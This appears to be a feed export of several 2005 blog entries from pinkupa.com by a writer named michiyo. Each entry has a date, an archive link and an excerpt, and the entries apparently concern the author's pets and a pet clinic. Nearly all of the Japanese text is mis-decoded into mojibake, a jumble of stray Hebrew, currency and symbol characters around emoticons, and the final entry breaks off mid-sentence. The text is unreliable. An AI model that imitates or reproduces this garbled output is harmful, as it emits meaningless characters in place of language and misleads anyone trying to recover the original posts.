-2005-12-08T21:16:28+09:00 - - -¥כ¥ׁ₪¯₪ף₪־°ה¹ -http://www.pinkupa.com/cgi-bin/weblog/archives/000617.php -÷£·מ¡¢²ז₪¬²ָ₪־₪×ט₪עִ¾₪¹»צ₪ֻ₪₪ך₪₪·₪¿¡£ ₪½₪־¹©»צ₪ֻ₪ט₪ֳ₪ֶ¡¢÷£₪₪ַ₪¢₪ֳ₪¿ֵ¾ל₪¬₪₪¯₪₪ך₪₪¹¡£ ֽ׳₪ֿ¡¢טְ׀₪־²¼₪ֻ¹װה₪עֶ‏₪ל₪כֹפ²°₪ע÷מ₪ך₪₪¹¡£ ¡¥«¥כ¥ָ₪ֳ₪ֶ₪־¡©¡ֻ ₪₪־₪ַ¹ֱָ₪₪עֱָ₪ף₪ְ₪ך¥³¥ף¥¯¥ך¡¼¥ָֹ₪­₪ֻ₪¹₪כ₪¿₪ב ÷£¸ו₪ֿ¥¥ֳ¥ָ₪עֻה₪ב₪ֶ₪¢₪²₪י₪ל₪כ¾ל½ך₪¬ּµ₪¯₪₪ך₪₪¹¡£ ÷£¡¢²ז₪¬²ָ₪־₪×ט₪ֻֻה₪₪ֳ₪ֶ₪₪₪כ¥כ¥ׁ₪¯₪ף₪־ °ה¹₪ֿ₪ֹ₪¦₪·₪ט₪¦¡©₪ֳ₪ֶ₪³₪ָ₪ֻ₪₪ך¡¢ ₪×»₪־½»¿¦ֽֽ₪ֱֻךֳּ₪·₪₪·₪¿¡£ ₪₪÷₪ֿ¡¢ֳו¹©₪¹₪כֱ°₪ֻ¥כ¥ׁ₪¯₪ף₪־°ה¹₪ע·¡₪ךµ¯₪³₪· ₪½₪ל₪ע¹װה₪ֶֻ‏₪ל₪ֶ¡¢₪½₪ל₪עֱִֹד₪הֱִלֳ£₪־¹װה₪ָ°ל½ן₪ֻ ¥«¥כ¥ָ₪ֶֻ‏₪ל₪ֶ₪¢₪²₪כ₪³₪ָ₪ֻ₪₪ך₪₪·₪¿¡£ ¥¥ֳ¥ָֽׁ₪־¹װה₪עֳµ₪·₪¿₪־₪ַ₪¹₪¬¡¢ ¶ב₪¯₪ַ₪ֿ¼ך₪ֶֻ‏₪ל₪כ₪³₪ָ₪¬₪ַ₪­₪₪«₪ֳ₪¿₪־₪ַ ¡¶ב₪¯₪ֻ¥¥ֳ¥ָ־מ±א₪₪ֹ₪¬ּµ₪₪₪־₪ַ₪¹¡ֻ ¥¡¼¥א¥»¥ף¥¿¡¼₪ַַ´³₪·₪עֶ‏₪ל₪כ¾®₪µ₪₪װה₪עַד₪₪ ₪½₪ל₪ע»ָ₪¦₪³₪ָ₪ֻ₪·₪₪·₪¿¡£ ₪ַ¡¢÷£ֶ₪×ט₪ֻ¹װ₪­¥כ¥ׁ₪¯₪ף₪ע¹װה₪ֻ°₪·₪ֶ₪­₪₪·₪¿¡£ ₪₪¡¡¢´₪ֻֻהֱע₪·₪ֶ₪«₪יָ¾ַ¯₪ג·׀²ב₪·₪ֶ₪₪₪¿₪־₪ַ ְ׳·ֱ₪ג₪₪¯ֵ₪ֻ´װ₪ֳ₪ֶ₪×₪ך₪₪·₪¿¡£ ₪₪־₪ַ¡¢¥כ¥ׁ₪¯₪ף₪עֻהֱע₪·₪¿½ך₪־ֵ₪ע¾¯₪·₪ְ₪± װה₪ֶֻ‏₪ל₪ֶ´ֹ₪·₪₪·₪¿¡£ ¹©»צ₪־´ײ₪ֿ¡¢₪×»₪ַ¥כ¥ׁ₪¯₪ף₪־¹װה₪גֲֽ₪«₪ֳ₪ֶ₪¯₪ל₪כ₪ָ₪־»צ₪₪־₪ַ ½»¿¦ֽֽ₪ֲֻֽ₪±₪ֶ₪­₪₪·₪¿¡£ ¥כ¥ׁ₪¯₪ף₪ֿ₪ֹ¡¼₪₪ֳ₪ֱ₪ד₪¦₪ף₪ְ₪ם₪¦¡©₪ָ ₪ֱ₪ח₪ֳ₪ָ¥ײ¥כ¡¼₪ְ₪ֳ₪¿₪־₪ַ₪³₪ל₪ַ₪ׂ₪ָ°ֲ¿´₪ַ₪¹(^_^;) ₪³₪ל₪ַ₪ֱ₪ד₪ף₪ֶָ±₪¸₪×ט₪ֶֻ‏₪ל₪כ₪ֽ₪ֳ¡×¥כ¥ׁ₪¯₪ף¢צ ₪½₪ל₪ֻ₪·₪ֶ₪ג¡¢¥כ¥ׁ₪¯₪ף₪עס₪ף₪ְ»ז₪ג ¥כ¥ׁ₪¯₪ף₪ג₪¢₪½₪³₪₪ַו÷־ן₪ֻּµ₪¯₪₪ֳ₪ֶ₪₪₪כ₪ָ₪ֿ¡£ ָ¾ַ¯₪ֳ₪ֳֶ»₪₪₪ט₪¦₪ִַ¹₪«₪ֳ₪¿₪־₪«₪·₪י¡© ֻט·מ°לֵ¡¢·מּ¿ֶ₪ֻ₪×»²₪ך₪ֻ¹װ₪¯₪־₪ַ₪¹₪¬ ¹װ₪¯₪¿₪׃₪ֻ¥כ¥ׁ₪¯₪ף₪¬־ר₪·₪¯₪₪כ₪₪¡(¨½_¨½)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-04T18:26:57+09:00 - - -µ÷₪ל₪ֿ₪´₪₪ֱ₪ד₪ף₪ְ₪±¡© -http://www.pinkupa.com/cgi-bin/weblog/archives/000616.php -¿ֽ¹©₪ג₪־₪ָ₪ֿ₪₪₪¨¡¢¥׳¥י¥ף¥ִ₪עֶ‏₪ל₪ֶ ¥¦¥ֳׁ£₪¬µ÷₪ל₪כ»ׁ₪ע³₪·₪₪ֻ₪·₪ֶ₪₪₪¿₪־₪ַ₪¹₪¬ ₪ֹ₪¦₪ה₪י¥׳¥י¥ף¥ִ₪עµ₪₪ֶֻ‏₪ֳ₪ֶ₪¯₪ל₪¿₪־₪ֿ₪´₪₪ֱ₪ד₪ף₪ְ₪±₪«₪ג(^_^;) ֲ¾₪־»ׂ₪ג₪¿₪₪ֻ₪ֿ¥׳¥י¥ף¥ִ₪ֻ¿¨₪ל₪כ₪±₪ֹ₪½₪ל₪ְ₪±¡£ ₪¢₪ָ₪ֿ¡¢¥¨¥µ₪ָ´×°ד₪₪₪·₪ֶ₪«₪¸₪ךֹױ₪¯₪¯₪י₪₪¡£ ₪ֳ₪ֶ₪³₪ָ₪ַ¡¢₪´₪₪ֱ₪ד₪ף₪ָ¿וֱנ¥·¥ח¥ֳ¥ָ¢צ ¿וֱנ₪¬₪·₪₪כ₪«₪ָ»׳₪₪₪­₪ה¡¢¿וֳז₪־ֳז₪₪־₪ַ ֹג־ֿ₪¬₪¢₪ך¡¢₪´₪₪ֱ₪ד₪ף₪¬¾ט₪ֳ₪ֶ₪גֲח¾זֹ׳₪ֳ¡×(¾׀) ¥«¥ב¥י₪ע¸‏₪±₪¿₪־₪ַ¡¢ ₪µ₪ֳ₪½₪¯ְµּּ₪ע¸‏₪­¥¡¼¥÷₪ע÷מ₪כ₪´₪₪ֱ₪ד₪ף₪ַ₪¹¢צ ₪ה₪ֳ₪ׁ₪ך·¯₪ֿ¼ּ¿¿₪ע»£₪י₪ל₪כ₪־₪¬¹¥₪­₪ְ₪ֽ₪§¡ֱ(¾׀)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-01T20:03:24+09:00 - - -´ָ‏²°¿וֱו¿וֿ³₪ל -http://www.pinkupa.com/cgi-bin/weblog/archives/000615.php -÷עֶ₪«₪י¡¢₪₪¿₪·₪ֶ₪ג´ָ‏²°¿וֱו₪־¿וֿ³₪ל₪¬ָ¯ְ¸¡µד¡ֻ ַד₪ֳ₪ֶ₪«₪י£±¥צ·מ₪ג·׀₪¿₪₪₪₪¦₪ֱ₪ֻ¿וֿ³₪ל₪·₪ֶ ¼«¬₪ַ½₪ֹ₪·₪ֶ»ָ₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪¹₪¬¡¢₪ה₪ֳ₪ׁ₪ך¥ְ¥ב₪ְ₪ֳ₪¿₪«(-o-; ₪½₪ל₪ַ₪ג¡¢£±ַ¯₪ֿ₪ג₪ֳ₪ֶ₪¯₪ל₪¿₪«₪י־ֹ₪·₪ָ₪·₪ט₪¦₪«¡£ ₪ַ¡¢÷£ֶ₪ֿ¥¿¥₪¥¥ף¥°־ֹ₪¯¡©»ֵ»צ₪¬14»‏₪ַ½×₪ן₪ך₪ְ₪ֳ₪¿₪־₪ַ µמ±¡¢¥¸¥ח¥₪¥ױ¥כִֵֻ₪״¹װ₪­¿וֱו₪עַד₪ֳ₪ֶ₪­₪₪·₪¿¡£ ½׀ָס₪ִֻֿ₪₪₪±₪ֹ¡¢₪־₪ך₪ֱ₪ד₪ף₪ָ₪´₪₪ֱ₪ד₪ף₪־ֲחְ₪₪×ֹפ²°₪ְ₪· ₪₪₪ִ₪₪¿¿וֿ³₪ל₪¹₪כ₪«ֹװ°ֲ₪עָ¼₪ֳ₪ֶ»ָ₪ֳ₪ֶ₪₪₪כ₪ט₪ך₪ֿ °ֲ¿´₪ַ₪­₪כ₪×ֹפ²°₪־‎₪¬₪₪₪₪₪ג₪ף₪ֽ(^_^;) »פ°י¿ו₪ֿ¡¢¸½÷₪ב₪ֱ₪ד₪¯₪ֱ₪ד־ֹ₪₪¾ץֲײ₪₪־₪ַ ₪½₪־₪₪»ָ₪₪₪₪·₪¿¡£´¹¿ו°לְ₪₪·₪ַ₪¹¡£ 60cm¿וֱו₪ָ₪₪ֶ±₪¸ֲח₪­₪µ₪־°בֱץ¥±¡¼¥¹₪גַד₪ֳ₪ֶ₪­₪ֶ ₪½₪־ֳז₪ֻ¿וֱו₪־¿ו₪ָ₪־₪ך¡ץ₪´₪₪עֶ‏₪ל₪ֶ¸ע´¹÷מ¶ָ₪ע₪·₪₪·₪¿¢צ ¿וֿ³₪ל₪·₪ֶ₪₪₪כ¿וֱו₪עֵ±µמ₪·₪ֶ¡¢¿·₪·₪₪¿וֱו₪ע ¿וֱוֲז₪ְֳֻײ₪·₪ֶ₪₪₪כ»‏₪ֻ¡¢°בֱץ¥±¡¼¥¹₪־ֳז₪ַ ־ֹ₪₪»ׂ₪ֲֻװ₪ֳ₪ֶ₪₪₪כ₪־₪ך₪ֱ₪ד₪ף₪ָ₪´₪₪ֱ₪ד₪ף₪ַ₪¹¡ִ¹₪ֳ¡ֻ ּף£±»‏´ײָ¾₪־÷מ¶ָ₪ע½×₪¨₪ֶ¡¢ ּµ»צ₪ֻ¿·₪·₪₪¿וֱו₪ֻ₪×°ת₪ֳ±₪·₪ַ₪­₪₪·₪¿¡£ ₪ֳ₪ֶ¡¢ֶ±₪¸¿וֱו₪ע¸ע´¹₪·₪¿₪«₪י¡¢¿וֿ³₪ל₪־ְק₪¡©₪¬ּµ₪₪»צ°³°₪ֿ ₪¹₪ֳ₪«₪ךֶ±₪¸₪₪ף₪ְ₪±₪ֹ₪ֽ(;^_^A ¥¢¥»¥¢¥»¡ִ °בֱץ¥±¡¼¥¹₪־ֳז₪ַ₪ֿ¡¢₪₪₪ִ₪ג₪ָ°ד₪¦¾ל½ך₪ְ₪ָ¬₪כ₪ָ₪₪¨₪ֶ ָשֶ°₪ְ₪ֻ₪»₪÷₪ֻ¡¢¸ַ₪₪ֳ₪ֶ₪₪₪₪·₪¿₪¬¡¢ ¿וֱו₪ֻּב₪·₪ֶ₪¢₪²₪¿₪י¥־¥½¥־¥½₪ֶָ°₪­»ֿ₪ב₪₪·₪¿(¾׀) ₪ֱ₪ח₪ֳ₪ָ₪·₪¿´ִ¶­₪־ׁ²½₪ֻ₪גֹׂ´¶₪₪־₪ֽ¡ִ·¯₪¿₪ֱ₪ֳ₪ֶ(^_^;)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-11-28T20:10:12+09:00 - - -ֽסֱד¼ְ´µ₪ֻ₪ִ₪₪₪ֶ -http://www.pinkupa.com/cgi-bin/weblog/archives/000614.php -²ָ₪־¥¦¥ׁ₪¯₪ף¡¢÷£₪ַ₪ג»‏¡¹¥¿¥¥´₪ע£²־³₪¯₪י₪₪»÷₪₪₪¹¡£ ¥µ¥₪¥¯¥כ₪ַ¸ְ₪¦₪ָ¡ִ¡ִ£²¥צ·מ₪ֻ°לֵ₪¯₪י₪₪₪«₪₪¡¡£ ֻ÷₪ל₪¿÷¢₪ֻ₪₪כ₪ָ¡¢£±¡ֱ£²־³₪־¥¿¥¥´₪¬ֽמ₪ֱ₪ֶ₪₪₪כ₪ף₪ַ₪¹₪ט₪ֽ(^_^;) ₪₪ְ₪×¢₪ֻ¥¿¥¥´₪עת₪¨₪ֶ₪₪₪כ₪־₪«¡© ₪ְ₪«₪י₪×¢₪¬ֲח₪­₪₪₪־₪«₪¡£ »÷₪₪₪«₪ֳ₪¿¥¿¥¥´₪ֲֿ־ֶג₪ֻµ¼‎₪µ₪ל₪ֶ₪·₪₪¦₪ָ₪₪₪¦ ֳֿ₪ע¹₪₪₪¿₪³₪ָ₪ג₪¢₪כ₪±₪ֹ¡¢₪ֹ₪¦₪₪־₪ַ₪·₪ח₪¦₪ֽ¡© ²ב¾ך₪»÷ֽס₪ֿ¡¢ֽסֱד¼ְ´µ₪־ֳ¸ץ₪ַ₪ג₪¢₪כ₪½₪¦₪ַ₪¹¡£ ָ¯¾נ₪ג²ב¾ך₪₪ֿ₪÷₪₪־₪ַ¡¢₪½₪ל₪עֽ₪¨₪כ₪³₪ָ₪גֹ¬ֽ׳₪ָ₪₪ך₪₪¹¡£ ־ד₪¨₪׀¿ו²¹₪־ׁ²½₪ָ₪«¡¢¥×¥¹₪ע°ל½ן₪ֻ₪·₪₪₪₪ָ₪«¡£ ¥¦¥ׁ₪¯₪ף₪ֽֿסֱד¼ְ´µ₪¸₪ד₪₪₪»צ₪עµ§₪ך₪₪¹¡£ ¸½÷¡¢¥¿¥¥´₪ע₪¿₪¯₪µ₪ף»÷ֽס₪·₪ֶ₪ג־ֹ₪₪₪ט₪¦₪ֻ ₪ֱ₪ח₪ֳ₪ָ₪ְ₪±¿ֽ¹©¥׳¥י¥ף¥ִ₪עֶ‏₪ל₪ֶ₪×₪­₪₪·₪¿¡£ ְµ¾ן₪»÷ֽס₪₪י¡¢₪³₪־ִרֵ₪־¥׳¥י¥ף¥ִ₪ַ₪ֲֿ­₪ך₪₪₪₪«₪ג₪ַ₪¹₪¬(^_^;) ₪½₪ל₪«₪י¡¢ֳכ₪ָּכ₪־¿ו²¹÷¹₪¬£²ֵ₪¯₪י₪₪₪¢₪כ₪ָ₪­₪ֿ ¥¦¥ׁ₪¯₪ף₪ֽֿמ₪ֱֳו₪­₪¬₪₪¯¡¢°לֳֶזֶ°₪­²ף₪ֳ₪ֶ₪₪₪כ₪־₪ַ ¿ו²¹÷¹₪גֻ״₪ֹ₪ַ₪₪₪₪ט₪¦₪ֱֻכ₪־³«₪±ִ₪ב₪₪ֹ₪ִַ´ְ°₪·₪ֶ₪₪₪₪¹¡£ ₪ג₪·₪×¢₪ֻ¥¿¥¥´₪עת₪¨₪ֶ₪₪₪כ₪₪י¡¢ ֱ´ֹפ»÷₪ף₪¸₪ד₪ֳ₪ֶ₪¯₪ל₪כ₪ָ₪₪₪₪₪ף₪ְ₪±₪ֹ₪¡£ ₪½₪ל₪«₪י¡¢¥×¥¹₪ָ¥ב¥¹₪־¥¥¢₪ַ»פ°י₪·₪ֶ₪₪₪כ´ָ‏²°¿וֱו₪ֻ₪ג ¿ֽ¹©¥׳¥י¥ף¥ִ₪עֶ‏₪ל₪ֶ₪×₪­₪₪·₪¿¡£ ָֻ¿£´₪ֻ₪ֿ¥»¥ׁ¥ל¡¼¥¿¡¼₪ַ»ְֵ₪ֳ₪ֶ₪·₪₪×₪¦₪ָ¹ֽ₪¨₪ֶ₪₪₪¿₪־₪ַ₪¹₪¬ »ְֵ₪עֶ‏₪ל₪¿₪¯₪י₪₪₪ַ₪ֱֿך¼ך₪־µ₪ַ₪₪ַ¾ֳ₪»₪₪₪₪־₪ַ ²ִ°¥ֱ₪«₪ג₪·₪ל₪₪₪₪ָ¸ְ₪¦ֳֿ₪ג¹₪₪₪¿₪־₪ַ¡¢ ₪ָ₪ך₪¢₪¨₪÷¸½ֳ³¬₪ַ₪ֿ₪½₪־₪₪°ל½ן₪ֻ»פ°י₪·₪ֶ₪×₪ך₪₪¹¡£ ₪ַ₪ג¡¢¼ֲ÷»÷ֽס₪·₪¿₪י₪ֹ¡¼₪·₪ט₪¦₪ֳ₪ֶ¾ץ¶·₪₪־₪ַ ֵ₪«₪י½ױ₪ֻ₪«₪±₪ֶ₪ֿ¡¢´°ֱ´₪ֻּ¿וֱו₪ַ°י₪ֶ₪¿‎₪¬־ֹ₪₪₪־₪ַ₪·₪ח₪¦₪ֽ¡£ ₪¦¡ֱ₪ף¡¢ּ₪₪ְ₪ַֻ÷₪ֳז>_... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼ֲֹµ₪¡¦²ר²זװ -michiyo -2005-11-22T20:04:33+09:00 - - -ּמְ¸¥¦¥ׁ₪ֻ₪ִ₪₪₪ֶ¸ל₪כ -http://www.pinkupa.com/cgi-bin/weblog/archives/000613.php -¸ל₪כ₪ֳ₪ֶ₪₪ֹ₪ַ₪ֿ₪¢₪ך₪₪»₪ף₪¬¡¢ ¥¯¥ך¥ֻ¥ֳ¥¯₪־ְטְ¸₪«₪י¡¢¡ײּמְ¸¥¦¥ׁ₪עַׂ¸«₪·₪₪·₪¿₪ט¡×¡׳₪ָ ¥ב¡¼¥כ₪¬ֽט₪ֶ¡¢₪½₪³₪ְַטְ¸₪¬´¶ֱ₪ע½ׂ₪₪ֶ₪₪₪י₪·₪¿₪־₪ַ ₪½₪־ױ₪ע¾¯₪·₪´¾ׂ²נ₪·₪ֶ₪×₪­₪₪¹(^_^;) ¡״₪¢₪ל₪¬ּמְ¸¸ֲַ־₪־ֲ־³₪ַ₪¹₪ֽ¡£ ·ט₪·₪ְֲֶ₪ֳ₪ֶ₪ֿ₪₪¯¡¢₪¬₪ֳ₪·₪ך₪ָ₪·₪¿ֲ־³₪ַ₪·₪¿¡£ ₪¢₪ל₪עּ»״₪·₪ֶ₪₪₪±₪׀־ֹ₪₪₪ָ»׳₪₪₪₪¹¡£ ¿ו₪ֻ´״₪·₪ֶ₪ג¡¢°ל¸«±ר₪₪₪ט₪¦₪ַ₪¹₪¬¡¢ ₪¢₪־»ֳׂ£₪ֻ₪ָ₪ֳ₪ֶ₪ֿ¡¢¸«₪¿ּ₪ַ₪ֿ₪₪¯₪ֶ¡¢ ₪¢₪־₪ט₪¦₪ֵ¥₪¬₪¢₪ֳ₪ֶ₪ג₪­₪ל₪₪₪¿ו₪₪־₪ַ₪·₪ח₪¦¡£ ¥׀¥¯¥ֶ¥ך¥¢₪₪ֹ₪ג₪₪₪ֳ₪ׁ₪₪₪₪₪ֶ¥׀¥י¥ף¥¹₪־¼ט₪ל₪¿₪­₪ל₪₪₪¿ו₪ע ₪·₪ֶ₪½₪¦₪ַ₪·₪¿₪ג₪־₪ֽ¡£₪½₪ל₪«₪י¡¢₪¢₪ל₪ְ₪±₪־ֵ¥₪¬₪¢₪כ₪־₪ַ₪¢₪ל₪׀¡¢ ₪½₪³₪ֻ½»₪א¾®ֶ°×₪ג₪«₪₪ך¥׀¥י¥¨¥ֶ¥£¡¼₪ֹֻ₪ף₪ַ₪₪₪כ₪־₪ַ₪·₪ח₪¦₪ֽ¡£ עװ₪ֻ´״₪·₪ֶ₪ג¡¢·ט₪·₪ֶ₪ױ₪µ₪ױ₪µ²ב₪®₪÷¡¢ּµ₪µ²ב₪®₪÷₪ָ₪₪₪ֳ₪¿₪ָ₪³₪ם₪ַ₪·₪¿₪ֽ¡£¡ ₪ָ₪־»צ₪ַ₪·₪¿¡£ ₪ה₪ֿ₪ך¿ֽ¹©»פ°י₪ָ₪ֿ°ד₪ֳ₪ֶ¥¨¥µ₪גֻ­ֹ₪ֲֻ¸÷₪¹₪כ₪ט₪¦₪ַ₪¹₪ֽ¡£ ₪ְ₪«₪י₪³₪½₪¢₪־₪ט₪¦₪־©ַֹ₪ֲ־³₪ֻ₪₪כ₪־₪ַ₪·₪ח₪¦₪ֽ¡£ ₪½₪ל₪ָ¡¢¸«₪¿ּ₪ָ₪ֿ°ד₪₪¿ו¼ֱ₪ג¥¦¥ֳׁ£₪ֻ₪ָ₪ֳ₪ֶ₪ֿ ־ֹ₪₪¾ץֲײ₪₪־₪«₪ג₪·₪ל₪₪»₪ף₪ֽ¡£ ₪ַ₪ג¡¢₪½₪¦₪₪י₪׀₪¿₪¯₪µ₪ף₪־¥¦¥ׁ₪¬ְ¸ֲ©₪·₪ֶ₪₪₪ֶ₪ג ₪₪₪₪´¶₪¸₪ג₪¹₪כ₪·¡ִ¼ֲ÷₪ֿ₪ֹ₪¦₪₪ף₪ַ₪·₪ח₪¦₪ֽ(^_^;) ₪₪÷¡¢»׳₪₪ְ₪ך±ר₪±₪ל₪׀ְ¸₪­»ִ₪ל₪₪₪₪ַ₪·₪ח₪¦₪«₪י ְ¸ֲ©₪ַ₪­₪כ₪₪ֹ₪ֻ₪ֿו÷־ן₪₪ף₪ְ₪ם₪¦₪ֳ₪ֶ₪³₪ָ₪ַ¡£ ₪ָ₪¦₪ײ₪ִ´סֱֵ·³°₪ָ¸ְ₪¨₪׀¡¢ ְ־¡¢ְטְ¸₪ג¥ײ¥ֳ¥·¥ו¥¥׃¡¼₪עֿ¢₪ל₪ֶ½׀±י₪·₪ֶ₪₪₪₪·₪¿(¾׀) ÷£₪ֻֿ´₪­¥ײ¥ֳ¥·¥ו₪ֱ₪ד₪ף¡£¥®¥÷¥ג₪ֻ₪½₪ֳ₪¯₪ך₪ֵַֻצ₪ֻ²ִ°¦₪«₪ֳ₪¿¡× »ה₪גֽ₪·₪₪₪־₪ַ₪¹₪¬¡¢¹ג²ֱ₪¹₪®₪ֶ¼ך₪¬½׀₪₪»₪ף¡µד¡ֻ ₪½₪ל₪«₪י¡¢ְטְ¸₪־¥µ¥₪¥ָ¡K's Pet Clinic¡₪־¡ײֲֹµ₪₪ָ¼£־ֵ¡׳₪ָ₪₪₪¦ ¥³¥ף¥ֶ¥ף¥ִ₪ֻ¡¢¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼₪־¾ֹ־ד₪ָ¼£־ֵ־ד₪¬¥¢¥ֳ¥׳₪µ₪ל₪ֶ₪₪¹¡£ ÷£₪ֿ₪₪ְ¡ײ¢¿ו¾ֹ¡׳₪ָ¡ײ₪׳₪«₪׳₪«ֲֹ¡¾ֳ²½´ֶֹג¥¬¥¹ֳש־±¡ֻ¡׳₪־£²₪ִ₪ַ₪¹₪¬ ÷£¸ו₪ג₪ַ₪­₪כ¸ֲ₪ך¹¹¿·₪·₪ִֶ÷₪±₪כ₪ָ₪־»צ₪ַ₪·₪¿¡°¡°... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-11-19T17:43:32+09:00 - - -ֶז₪־ַ׃ץס₪³₪ל₪₪ֻ¡©¡ֻ -http://www.pinkupa.com/cgi-bin/weblog/archives/000612.php -₪³₪³£²¥צ·מ₪¯₪י₪₪¡¢₪־₪ך₪ֱ₪ד₪ף₪¬ֶז₪־ַ׃ץ×₪ע½׀₪·₪₪¹¡£ ·מ₪ֻ°לֵ₪¯₪י₪₪₪־¥¿¥₪¥¥ף¥°₪₪ף₪ַ₪¹₪ט¡£ ַע₪ֳ₪₪₪¥¼¥ך¡¼₪₪¿₪₪₪¡¢¥¼¥י¥ֱ¥ף¼ֱ₪₪¿₪₪₪¡ִ¡£ ¼ֲ÷₪ֻ₪ֿ₪³₪ל¢­₪ַ₪¹¡£ ¥¯¥ך¥ֻ¥ֳ¥¯₪־ְטְ¸₪ֻ²טֱ₪עֱק₪ך¡¢¸«₪ִֶ÷₪₪₪¿₪־₪ַ₪¹₪¬¡¢ ֲֵֹ×₪ֻ₪ֿ»׳₪¨₪₪₪₪±₪ֹ¡¢²¿₪ְ₪«¬₪י₪₪₪₪ֳ₪ֶ»צ₪ַ₪·₪¿(^_^;) »פ°י¥»¥ף¥¿¡¼₪ה¸¦µז½ך´״·¸₪־₪₪¦₪¬₪³₪¦₪₪₪ֳ₪¿₪³₪ָ₪ֿ ¬₪«₪כ₪ָ»׳₪¦₪ָ₪־»צ₪ְ₪ֳ₪¿₪־₪ַ¥µ¥ף¥·¥ח¥¦¥¦¥×¥»¥ף¥¿¡¼₪״ ּה₪₪¹ח₪ן₪»₪ֶ₪ֿ₪₪₪כ₪־₪ַ₪¹₪¬¡¢₪₪ְ²ףֵתּµ₪ֳ₪·₪ף₪°¡£ ָֻ¿£´₪־¥ב¥¹ֳֶֽ­₪־ַ׃ץ×₪ָ₪«₪½₪¦₪ז₪¦₪־₪ָ₪ֿ°ד₪¦₪־₪«₪¡© ₪ַ₪ג¡¢¥¦¥ׁ₪¯₪ף₪ג¥כ¥ׁ₪¯₪ף₪ג₪³₪ף₪₪־½׀₪µ₪₪«₪ֳ₪¿µ₪₪¬₪¹₪כ₪·¡£ ₪־₪ך₪ֱ₪ד₪ף₪ֿ»ך₪ֳ₪ֶ¸µµ₪¡£ ±ֲ¿©₪₪₪ג₪ט₪¯¡¢ֱי₪»₪כ₪ַ₪ג₪₪¯¡¢ְֲ₪כ₪ַ₪ג₪₪¯ ֳֶ₪ֻׁ₪ן₪ֳ₪¿ֽֽ»ׂ₪ג₪₪₪₪·¡¢ֹבֳִּ₪ך·ע¹¯₪½₪¦₪₪ף₪ַ₪¹₪¬¡ִ¡£ ₪₪₪µ₪ף₪־¥¦¥ׁ₪¿₪ףֳ£₪ֿ₪ֹ₪¦₪ַ₪¹₪«¡© ²ָ₪ג½׀₪¿₪³₪ָ₪¢₪כ₪ט¡×₪ָ₪«¡¢₪½₪לֳ־₪ֳ₪ֶ₪₪₪כ₪ט¡×₪ֳ₪ֶ‎₪¬₪×₪ך₪₪·₪¿₪י ₪ֹ₪¦₪¾¥³¥ב¥ף¥ָֽף₪ה·ַ¼¨ִָ¡¢¥ב¡¼¥כ₪₪ֹ₪ַ¾נף₪עִ÷₪±₪כ₪ָ½ץ₪«₪ך₪₪¹m(__)m... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-11-15T19:20:32+09:00 - - -¥¥ֶ₪ֶ₪£₪ף₪×ַ¯÷¢¡© -http://www.pinkupa.com/cgi-bin/weblog/archives/000611.php -₪ֹ₪ה₪י¥¥ֶ¥ָ₪ֿ½ק₪־»ׂ₪ֳ₪₪₪₪ַ₪¹¡£ ִֻ₪י₪₪¬₪¢₪כ₪ט₪¦₪µ₪₪ג₪¹₪כ₪±₪ֹ¡¢ ֳֻ₪־»ׂ₪ֻ₪·₪ֶ₪ֲֿ­₪ךּµ₪¹₪®₪כµ₪₪ג₪¹₪כ₪·¡£ ₪₪־₪ַ¡¢¸½ֳ³¬₪ַ₪ֿ½ק₪־»ׂ₪ֳ₪ֶ»צ₪ַ(¾׀) ₪½₪־¥¥ֶ₪ֶ₪£₪ף₪ַ₪¹₪¬¡¢ ₪ֹ₪¦₪ה₪יַ¯÷¢₪י₪·₪¯¡¢×»׳₪₪₪ֳֻ¿₪ֳ₪ֶ₪×₪ך₪₪¹¡₪₪ף₪ָ₪«¡©¡ֻ ₪ֽ¡© ¥¿¥³װה₪ֻ₪ֱ₪ח₪³₪ף₪ָ¥¢¥´₪ע¾ט₪»₪ֶ ±ף₪¯₪ע¸«₪ִ₪ב₪ֶ×»׳₪₪₪ֳֻ¿₪ֳ₪ֶ₪₪₪כ₪ַ₪·₪ח₪¦¡©(^o^;) ֳ¯₪«₪ֻ־ר₪ַ₪ג₪·₪¿₪־₪«₪·₪י¡©¡₪₪₪₪₪₪¡ֻ ₪³₪־»‏₪ֿ¡¢ֱִ₪·₪¯¥«¥ב¥י₪ע¸‏₪±₪ֶ₪גָשֶ°₪ְ₪ֻ₪»₪÷ ּµָ¿±‏₪־₪₪¥·¥ד¥ֳ¥¿¡¼₪עְ₪י₪»₪ֶ₪¯₪ל₪₪·₪¿(¾׀) ·ט₪·₪ֶ¶ס¹ח₪¬°­₪₪₪ֳ₪ֶ¬₪±₪ַ₪ג₪₪¯¡¢ ֳ±₪ֻ¿²₪ֶ₪₪₪¿₪ְ₪±₪₪־₪«¡¢¿פ¬¸ו₪ֻ₪ֶֿ°₪­₪ְ₪·₪ֶ ¥ֿ¥ֳ¥¹¥כ¥ֿ¥ֳ¥¹¥כ₪·₪ֶ₪₪·₪¿¢צ ₪³₪ף₪¥¥ֶ₪ֶ₪£₪ף₪גֵֻצ₪ֻ²ִ°¦₪₪₪־₪¥(*¡±m¡±) ¥׳¥׳¥ֳ... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-11-12T16:20:08+09:00 - - -¥·¥³₪ױ₪ף₪¸₪ד₪ֳ₪¿ -http://www.pinkupa.com/cgi-bin/weblog/archives/000610.php -÷£ֶ₪ֿ₪ׂ₪ֳ₪µ₪·₪ײ₪ך₪ֻ¥װ¥ף¥¯¥¥¦¥¹₪ע₪¢₪²₪₪·₪¿¡£ ´°₪₪¹₪כ»ׁ₪ַֿק־ֿ₪¢₪ך₪₪¹₪¬¡¢ֻ‏ֲ­₪½₪¦₪ֻ ¥¸¥ֳ₪ָ₪·₪ֶ₪₪₪כ₪־₪ַ¡¢₪₪כ₪ַ¿´¾ץֲײ₪₪¿₪₪₪ַ₪¹(¾׀) ¥װ¥ף¥¯¥¥¦¥¹₪¬¹¢₪עִּ₪ך₪ה₪¹₪₪₪ט₪¦₪ֻ 